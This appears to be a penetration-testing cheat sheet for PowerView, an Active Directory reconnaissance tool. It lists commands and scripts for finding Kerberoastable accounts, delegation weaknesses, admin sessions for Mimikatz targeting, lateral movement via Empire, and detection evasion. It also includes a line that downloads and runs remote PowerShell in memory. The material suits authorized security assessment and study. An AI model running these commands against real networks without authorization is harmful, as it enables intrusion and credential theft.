PowerView Active Directory Enumeration Tool Cheat Sheet

📋 Copy All Commands 📄 Generate PDF

Overview

PowerView is a PowerShell tool developed by Will Schroeder (@harmj0y) as part of the PowerSploit framework. It's designed for Active Directory enumeration and exploitation, providing extensive functionality for domain reconnaissance, privilege escalation path discovery, and attack vector identification in Windows environments.

⚠️ Warning: This tool is intended for authorized penetration testing and security assessments only. Ensure you have proper authorization before using in any environment.

Installation

PowerSploit Installation

# Download PowerSploit
Invoke-WebRequest -Uri "https://github.com/PowerShellMafia/PowerSploit/archive/master.zip" -OutFile "PowerSploit.zip"
Expand-Archive -Path "PowerSploit.zip" -DestinationPath "C:\Tools\"

# Import PowerView
Import-Module C:\Tools\PowerSploit-master\Recon\PowerView.ps1

# Alternative direct import
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')

Standalone PowerView

# Download standalone PowerView
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1" -OutFile "PowerView.ps1"

# Import PowerView
Import-Module .\PowerView.ps1

# Or execute directly
. .\PowerView.ps1

Dev Branch (Latest Features)

# Download dev branch (more features)
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1" -OutFile "PowerView-dev.ps1"
Import-Module .\PowerView-dev.ps1

Basic Usage

Module Loading and Help

# Import PowerView
Import-Module PowerView.ps1

# Get all PowerView commands
Get-Command -Module PowerView

# Get help for specific function
Get-Help Get-DomainUser -Full

# List all PowerView functions
Get-Command *-Domain*
Get-Command *-Net*

Basic Domain Information

# Get current domain
Get-Domain

# Get domain controllers
Get-DomainController

# Get domain policy
Get-DomainPolicy

# Get domain trusts
Get-DomainTrust

# Get forest information
Get-Forest

Domain Enumeration

User Enumeration

# Get all domain users
Get-DomainUser

# Get specific user
Get-DomainUser -Identity administrator

# Get users with specific properties
Get-DomainUser -Properties samaccountname,description,pwdlastset

# Get users with SPN set (Kerberoastable)
Get-DomainUser -SPN

# Get users with pre-authentication disabled (AS-REP Roastable)
Get-DomainUser -PreauthNotRequired

# Get privileged users
Get-DomainUser -AdminCount

# Get users with passwords not required
Get-DomainUser -PasswordNotRequired

Group Enumeration

# Get all domain groups
Get-DomainGroup

# Get specific group
Get-DomainGroup -Identity "Domain Admins"

# Get group members
Get-DomainGroupMember -Identity "Domain Admins"

# Get groups for specific user
Get-DomainGroup -UserName administrator

# Get local groups on machines
Get-NetLocalGroup -ComputerName server01

# Get local group members
Get-NetLocalGroupMember -ComputerName server01 -GroupName Administrators

Computer Enumeration

# Get all domain computers
Get-DomainComputer

# Get computers with specific OS
Get-DomainComputer -OperatingSystem "*Server 2019*"

# Get computer properties
Get-DomainComputer -Properties dnshostname,operatingsystem,lastlogontimestamp

# Get computers with unconstrained delegation
Get-DomainComputer -UnconstrainedDelegation

# Get computers with constrained delegation
Get-DomainComputer -TrustedToAuth

# Get domain controllers
Get-DomainComputer -Properties dnshostname|Where-Object \\\\{$_.dnshostname -like "*dc*"\\\\}

Service Principal Name (SPN) Enumeration

# Get all SPNs
Get-DomainUser -SPN|Select-Object samaccountname,serviceprincipalname

# Get specific SPN types
Get-DomainUser -SPN|Where-Object \\\\{$_.serviceprincipalname -like "*SQL*"\\\\}

# Get SPNs for specific service
Get-DomainUser -SPN|Where-Object \\\\{$_.serviceprincipalname -like "*HTTP*"\\\\}

# Get unique SPN services
Get-DomainUser -SPN|ForEach-Object \\\\{$_.serviceprincipalname\\\\}|ForEach-Object \\\\{$_.split('/')[0]\\\\}|Sort-Object -Unique

Network Enumeration

Session Enumeration

# Get sessions on local machine
Get-NetSession

# Get sessions on remote machine
Get-NetSession -ComputerName server01

# Get sessions for all domain computers
Get-DomainComputer|ForEach-Object \\\\{Get-NetSession -ComputerName $_.dnshostname\\\\}

# Get logged on users
Get-NetLoggedon -ComputerName server01

# Get locally logged on users
Get-NetLoggedon -ComputerName server01 -LocalOnly

Share Enumeration

# Get shares on local machine
Get-NetShare

# Get shares on remote machine
Get-NetShare -ComputerName server01

# Get shares for all domain computers
Get-DomainComputer|ForEach-Object \\\\{Get-NetShare -ComputerName $_.dnshostname\\\\}

# Find interesting shares
Find-DomainShare

# Find readable shares
Find-DomainShare -CheckShareAccess

Process Enumeration

# Get processes on remote machine
Get-NetProcess -ComputerName server01

# Get processes for specific user
Get-NetProcess -ComputerName server01|Where-Object \\\\{$_.owner -like "*administrator*"\\\\}

# Get processes across domain
Get-DomainComputer|ForEach-Object \\\\{Get-NetProcess -ComputerName $_.dnshostname\\\\}

Access Control and Permissions

ACL Enumeration

# Get ACLs for domain object
Get-DomainObjectAcl -Identity "Domain Admins"

# Get ACLs with specific rights
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs

# Find interesting ACLs
Find-InterestingDomainAcl

# Get ACLs for specific user
Get-DomainObjectAcl -Identity administrator -ResolveGUIDs

# Find objects with specific ACE
Get-DomainObjectAcl|Where-Object \\\\{$_.SecurityIdentifier -eq "S-1-5-21-..."\\\\}

Permission Analysis

# Find objects modifiable by current user
Find-InterestingDomainAcl -ResolveGUIDs|Where-Object \\\\{$_.IdentityReferenceName -like "*$env:USERNAME*"\\\\}

# Find GenericAll permissions
Get-DomainObjectAcl -ResolveGUIDs|Where-Object \\\\{$_.ActiveDirectoryRights -like "*GenericAll*"\\\\}

# Find WriteDacl permissions
Get-DomainObjectAcl -ResolveGUIDs|Where-Object \\\\{$_.ActiveDirectoryRights -like "*WriteDacl*"\\\\}

# Find WriteOwner permissions
Get-DomainObjectAcl -ResolveGUIDs|Where-Object \\\\{$_.ActiveDirectoryRights -like "*WriteOwner*"\\\\}

Trust and Forest Enumeration

Domain Trust Analysis

# Get domain trusts
Get-DomainTrust

# Get forest trusts
Get-ForestTrust

# Map domain trusts
Get-DomainTrustMapping

# Get external trusts
Get-DomainTrust -API|Where-Object \\\\{$_.trust_type -eq "TRUST_TYPE_EXTERNAL"\\\\}

# Get bidirectional trusts
Get-DomainTrust|Where-Object \\\\{$_.TrustDirection -eq "Bidirectional"\\\\}

Cross-Domain Enumeration

# Enumerate users in trusted domain
Get-DomainUser -Domain trusted.domain.com

# Enumerate groups in trusted domain
Get-DomainGroup -Domain trusted.domain.com

# Get foreign group members
Get-DomainForeignGroupMember

# Get foreign users
Get-DomainForeignUser

Privilege Escalation Paths

Local Admin Access

# Find local admin access
Find-LocalAdminAccess

# Test local admin access on specific machine
Test-AdminAccess -ComputerName server01

# Find machines where current user has local admin
Get-DomainComputer|ForEach-Object \\\\{Test-AdminAccess -ComputerName $_.dnshostname\\\\}

# Find machines where domain users have local admin
Find-DomainLocalGroupMember -GroupName Administrators

Delegation Analysis

# Find unconstrained delegation
Get-DomainComputer -UnconstrainedDelegation

# Find constrained delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Find resource-based constrained delegation
Get-DomainComputer|Get-DomainObjectAcl -ResolveGUIDs|Where-Object \\\\{$_.ObjectAceType -eq "ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity"\\\\}

Kerberoasting Targets

# Find Kerberoastable users
Get-DomainUser -SPN

# Get detailed Kerberoasting targets
Get-DomainUser -SPN|Select-Object samaccountname,serviceprincipalname,pwdlastset,lastlogon

# Find high-value Kerberoasting targets
Get-DomainUser -SPN -AdminCount

# Find Kerberoastable users with old passwords
Get-DomainUser -SPN|Where-Object \\\\{$_.pwdlastset -lt (Get-Date).AddDays(-365)\\\\}

Attack Vector Discovery

BloodHound Data Collection

# Collect data for BloodHound (requires SharpHound)
# PowerView can supplement BloodHound data collection

# Get user sessions for BloodHound
Get-DomainComputer|ForEach-Object \\\\{
    $computer = $_.dnshostname
    $sessions = Get-NetSession -ComputerName $computer
    foreach ($session in $sessions) \\\\{
        [PSCustomObject]@\\\\{
            Computer = $computer
            User = $session.sesi10_username
            Source = $session.sesi10_cname
        \\\\}
    \\\\}
\\\\}

Lateral Movement Paths

# Find computers with sessions from high-value users
$highValueUsers = Get-DomainGroupMember -Identity "Domain Admins"|Select-Object -ExpandProperty MemberName
Get-DomainComputer|ForEach-Object \\\\{
    $computer = $_.dnshostname
    $sessions = Get-NetLoggedon -ComputerName $computer
    foreach ($session in $sessions) \\\\{
        if ($highValueUsers -contains $session.wkui1_username) \\\\{
            Write-Output "High-value user $($session.wkui1_username) logged on to $computer"
        \\\\}
    \\\\}
\\\\}

# Find shortest path to Domain Admins
Find-DomainUserLocation -UserGroupIdentity "Domain Admins"

Advanced Enumeration Techniques

LDAP Queries

# Custom LDAP queries
Get-DomainUser -LDAPFilter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))"

# Find users with specific attributes
Get-DomainUser -LDAPFilter "(&(objectCategory=person)(objectClass=user)(description=*))"

# Find computers with specific OS
Get-DomainComputer -LDAPFilter "(&(objectCategory=computer)(operatingSystem=*Server*))"

# Find groups with specific names
Get-DomainGroup -LDAPFilter "(&(objectCategory=group)(name=*admin*))"

GPO Enumeration

# Get all GPOs
Get-DomainGPO

# Get GPOs applied to specific OU
Get-DomainGPO -ComputerIdentity "OU=Servers,DC=domain,DC=com"

# Find interesting GPO settings
Get-DomainGPOLocalGroup

# Get GPO computer local group settings
Get-DomainGPOComputerLocalGroupMapping

# Find GPOs with specific settings
Get-DomainGPO|Where-Object \\\\{$_.displayname -like "*password*"\\\\}

OU and Container Analysis

# Get all OUs
Get-DomainOU

# Get objects in specific OU
Get-DomainComputer -SearchBase "OU=Servers,DC=domain,DC=com"

# Get OU ACLs
Get-DomainOU|Get-DomainObjectAcl -ResolveGUIDs

# Find interesting OU permissions
Get-DomainOU|Get-DomainObjectAcl -ResolveGUIDs|Where-Object \\\\{$_.ActiveDirectoryRights -like "*GenericAll*"\\\\}

Stealth and Evasion

Avoiding Detection

# Use alternate credentials
$cred = Get-Credential
Get-DomainUser -Credential $cred

# Use specific domain controller
Get-DomainUser -Server dc02.domain.com

# Limit queries to avoid detection
Get-DomainUser -ResultPageSize 100

# Use LDAPS for encrypted queries
Get-DomainUser -Server dc01.domain.com -ServerTimeLimit 30

Minimal Footprint Enumeration

# Essential enumeration with minimal queries
$domain = Get-Domain
$domainAdmins = Get-DomainGroupMember -Identity "Domain Admins"
$spnUsers = Get-DomainUser -SPN
$computers = Get-DomainComputer -Properties dnshostname,operatingsystem

# Targeted enumeration
$targetUsers = @("administrator", "service_account", "backup_admin")
foreach ($user in $targetUsers) \\\\{
    Get-DomainUser -Identity $user
\\\\}

Automation and Reporting

Comprehensive Domain Assessment

# Comprehensive domain assessment script
param(
    [string]$OutputPath = "C:\Temp\DomainAssessment",
    [string]$Domain = $env:USERDOMAIN
)

# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

Write-Host "[+] Starting comprehensive domain assessment for $Domain"

# Domain information
Write-Host "[+] Gathering domain information..."
Get-Domain|Out-File "$OutputPath\domain_info.txt"
Get-DomainController|Out-File "$OutputPath\domain_controllers.txt"
Get-DomainTrust|Out-File "$OutputPath\domain_trusts.txt"

# User enumeration
Write-Host "[+] Enumerating users..."
Get-DomainUser|Export-Csv "$OutputPath\domain_users.csv" -NoTypeInformation
Get-DomainUser -SPN|Export-Csv "$OutputPath\spn_users.csv" -NoTypeInformation
Get-DomainUser -AdminCount|Export-Csv "$OutputPath\privileged_users.csv" -NoTypeInformation

# Group enumeration
Write-Host "[+] Enumerating groups..."
Get-DomainGroup|Export-Csv "$OutputPath\domain_groups.csv" -NoTypeInformation
Get-DomainGroupMember -Identity "Domain Admins"|Export-Csv "$OutputPath\domain_admins.csv" -NoTypeInformation

# Computer enumeration
Write-Host "[+] Enumerating computers..."
Get-DomainComputer|Export-Csv "$OutputPath\domain_computers.csv" -NoTypeInformation
Get-DomainComputer -UnconstrainedDelegation|Export-Csv "$OutputPath\unconstrained_delegation.csv" -NoTypeInformation

# Share enumeration
Write-Host "[+] Enumerating shares..."
Find-DomainShare|Export-Csv "$OutputPath\domain_shares.csv" -NoTypeInformation

# ACL analysis
Write-Host "[+] Analyzing ACLs..."
Find-InterestingDomainAcl -ResolveGUIDs|Export-Csv "$OutputPath\interesting_acls.csv" -NoTypeInformation

Write-Host "[+] Assessment complete. Results saved to $OutputPath"

Privilege Escalation Path Discovery

# Privilege escalation path discovery script
param(
    [string]$TargetUser = "administrator",
    [string]$OutputPath = "C:\Temp\PrivEscPaths"
)

New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

Write-Host "[+] Discovering privilege escalation paths to $TargetUser"

# Find local admin access
Write-Host "[+] Finding local admin access..."
$localAdminAccess = Find-LocalAdminAccess
$localAdminAccess|Out-File "$OutputPath\local_admin_access.txt"

# Find user sessions
Write-Host "[+] Finding user sessions..."
$userSessions = Get-DomainComputer|ForEach-Object \\\\{
    $computer = $_.dnshostname
    try \\\\{
        $sessions = Get-NetSession -ComputerName $computer -ErrorAction SilentlyContinue
        foreach ($session in $sessions) \\\\{
            [PSCustomObject]@\\\\{
                Computer = $computer
                User = $session.sesi10_username
                Source = $session.sesi10_cname
            \\\\}
        \\\\}
    \\\\} catch \\\\{\\\\}
\\\\}
$userSessions|Export-Csv "$OutputPath\user_sessions.csv" -NoTypeInformation

# Find Kerberoastable users
Write-Host "[+] Finding Kerberoastable users..."
$kerberoastable = Get-DomainUser -SPN
$kerberoastable|Export-Csv "$OutputPath\kerberoastable_users.csv" -NoTypeInformation

# Find delegation opportunities
Write-Host "[+] Finding delegation opportunities..."
$delegation = @()
$delegation += Get-DomainComputer -UnconstrainedDelegation|Select-Object @\\\\{Name="Type";Expression=\\\\{"Unconstrained"\\\\}\\\\}, @\\\\{Name="Object";Expression=\\\\{$_.dnshostname\\\\}\\\\}
$delegation += Get-DomainUser -TrustedToAuth|Select-Object @\\\\{Name="Type";Expression=\\\\{"Constrained"\\\\}\\\\}, @\\\\{Name="Object";Expression=\\\\{$_.samaccountname\\\\}\\\\}
$delegation|Export-Csv "$OutputPath\delegation_opportunities.csv" -NoTypeInformation

Write-Host "[+] Privilege escalation path discovery complete"

Network Mapping Script

# Network mapping script
param(
    [string]$OutputPath = "C:\Temp\NetworkMapping"
)

New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

Write-Host "[+] Starting network mapping"

# Get all computers
$computers = Get-DomainComputer -Properties dnshostname,operatingsystem

# Map shares
Write-Host "[+] Mapping shares..."
$allShares = @()
foreach ($computer in $computers) \\\\{
    try \\\\{
        $shares = Get-NetShare -ComputerName $computer.dnshostname -ErrorAction SilentlyContinue
        foreach ($share in $shares) \\\\{
            $allShares += [PSCustomObject]@\\\\{
                Computer = $computer.dnshostname
                ShareName = $share.shi1_netname
                ShareType = $share.shi1_type
                Remark = $share.shi1_remark
            \\\\}
        \\\\}
    \\\\} catch \\\\{\\\\}
\\\\}
$allShares|Export-Csv "$OutputPath\network_shares.csv" -NoTypeInformation

# Map sessions
Write-Host "[+] Mapping sessions..."
$allSessions = @()
foreach ($computer in $computers) \\\\{
    try \\\\{
        $sessions = Get-NetSession -ComputerName $computer.dnshostname -ErrorAction SilentlyContinue
        foreach ($session in $sessions) \\\\{
            $allSessions += [PSCustomObject]@\\\\{
                Computer = $computer.dnshostname
                User = $session.sesi10_username
                Source = $session.sesi10_cname
                Time = $session.sesi10_time
            \\\\}
        \\\\}
    \\\\} catch \\\\{\\\\}
\\\\}
$allSessions|Export-Csv "$OutputPath\network_sessions.csv" -NoTypeInformation

Write-Host "[+] Network mapping complete"

Integration with Other Tools

BloodHound Integration

# Supplement BloodHound data with PowerView
# Get additional session data
$sessions = Get-DomainComputer|ForEach-Object \\\\{
    Get-NetSession -ComputerName $_.dnshostname
\\\\}

# Get additional local group data
$localGroups = Get-DomainComputer|ForEach-Object \\\\{
    Get-NetLocalGroupMember -ComputerName $_.dnshostname -GroupName Administrators
\\\\}

# Export for BloodHound custom queries
$sessions|ConvertTo-Json|Out-File "bloodhound_sessions.json"
$localGroups|ConvertTo-Json|Out-File "bloodhound_localgroups.json"

Mimikatz Integration

# Find targets for Mimikatz
$highValueSessions = Get-DomainComputer|ForEach-Object \\\\{
    $computer = $_.dnshostname
    $sessions = Get-NetLoggedon -ComputerName $computer
    $sessions|Where-Object \\\\{$_.wkui1_username -in @("administrator", "domain admin", "enterprise admin")\\\\}
\\\\}

# Output targets for credential dumping
$highValueSessions|Select-Object Computer, User|Export-Csv "mimikatz_targets.csv" -NoTypeInformation

Empire Integration

# Generate target list for Empire
$targets = Find-LocalAdminAccess
$targets|ForEach-Object \\\\{
    Write-Output "usemodule lateral_movement/invoke_psexec"
    Write-Output "set ComputerName $_"
    Write-Output "execute"
\\\\}

Troubleshooting

Common Issues

# LDAP query failures
# Check domain connectivity
Test-NetConnection -ComputerName (Get-Domain).PdcRoleOwner -Port 389

# Permission issues
# Check current user context
whoami /groups

# Network connectivity
# Test WMI access
Get-WmiObject -Class Win32_OperatingSystem -ComputerName server01

# DNS resolution
# Test name resolution
Resolve-DnsName domain.com

Debug Mode

# Enable verbose output
$VerbosePreference = "Continue"

# Test specific functions
Get-DomainUser -Identity administrator -Verbose

# Check LDAP queries
Get-DomainUser -LDAPFilter "(samaccountname=administrator)" -Verbose

Best Practices

Operational Security

1. Use legitimate accounts: Avoid suspicious service accounts
2. Limit queries: Don't flood domain controllers with requests
3. Use specific targets: Target specific objects rather than broad enumeration
4. Clean up: Remove any created objects or modified ACLs
5. Monitor logs: Be aware of generated security events

Enumeration Strategy

# Phased approach
# Phase 1: Basic domain information
Get-Domain
Get-DomainController

# Phase 2: User and group enumeration
Get-DomainUser -Properties samaccountname,description
Get-DomainGroup -Properties samaccountname,description

# Phase 3: Privilege analysis
Get-DomainUser -AdminCount
Find-InterestingDomainAcl

# Phase 4: Attack vector identification
Get-DomainUser -SPN
Find-LocalAdminAccess

Resources

• PowerView GitHub Repository
• Harmj0y's Blog
• PowerSploit Documentation
• Active Directory Security
• SpecterOps Blog

---

This cheat sheet provides a comprehensive reference for using PowerView. Always ensure you have proper authorization before conducting Active Directory security assessments.